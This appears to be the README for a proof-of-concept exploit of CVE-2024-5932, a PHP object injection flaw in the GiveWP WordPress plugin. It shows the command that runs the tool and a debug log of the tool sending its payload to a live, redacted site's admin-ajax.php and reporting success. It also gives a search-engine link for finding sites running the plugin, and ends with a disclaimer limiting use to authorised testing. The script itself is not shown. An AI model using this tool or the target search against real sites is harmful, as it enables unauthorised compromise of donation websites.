Proof-of-Concept for CVE-2024-5932 GiveWP PHP Object Injection
python3 exploit.pyThe script will ask you to set the target URL and the URL where the Donation form is located.
┌──(root💀)-[~/CVE-2024-5932-PoC]
└─# python3 exploit.py
Enter the target domain (e.g., example.com):
Please enter the full donation form URL (e.g., https://example.com/donations/donation-form):┌──(root💀)-[~/CVE-2024-5932-PoC]
└─# python3 exploit.py
Please enter the domain (e.g., example.com): xxxxxxxx.org
Please enter the full donation form URL (e.g., https://example.com/donations/donation-form): https://xxxxxxxx.org/donations/donation-form/2024-08-22 15:16:52,154 - DEBUG - Attempting to access: https://xxxxxxxx.org/donations/donation-form/
2024-08-22 15:16:52,156 - DEBUG - Starting new HTTPS connection (1): xxxxxxxx.org:443
2024-08-22 15:16:52,580 - DEBUG - https://xxxxxxxx.org:443 "GET /donations/donation-form/ HTTP/1.1" 200 17518
2024-08-22 15:16:52,709 - DEBUG - Received response with status code: 200
2024-08-22 15:16:52,721 - DEBUG - Searching for donation form in the page HTML...
2024-08-22 15:16:52,722 - DEBUG - Donation form found.
2024-08-22 15:16:52,723 - DEBUG - Payload prepared successfully.
2024-08-22 15:16:52,723 - INFO - Sending exploit to https://xxxxxxxx.org/wp-admin/admin-ajax.php...
2024-08-22 15:16:52,723 - DEBUG - Preparing payload...
2024-08-22 15:16:52,724 - DEBUG - Starting new HTTPS connection (1): xxxxxxxx.org:443
2024-08-22 15:16:54,462 - DEBUG - https://xxxxxxxx.org:443 "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 None
2024-08-22 15:16:54,462 - DEBUG - Exploit response status code: 200
2024-08-22 15:16:54,462 - INFO - Exploit sent successfully!https://hunter.how/list?searchValue=web.body%3D%22%2Fwp-content%2Fplugins%2Fgive%22
This script is provided for educational and research purposes only. The intent of this tool is to help security researchers and penetration testers identify vulnerabilities in systems that they have explicit permission to test. Unauthorized access to computer systems is illegal and unethical.
By using this script, you agree to take full responsibility for any actions performed with it. The author and contributors to this script are not responsible for any damages or legal consequences that may arise from its use. Ensure that you have proper authorization before testing any systems with this tool.
Use this tool responsibly and only on systems for which you have explicit permission to perform security testing.
If you are unsure about the legality of your actions, consult with a legal professional before proceeding.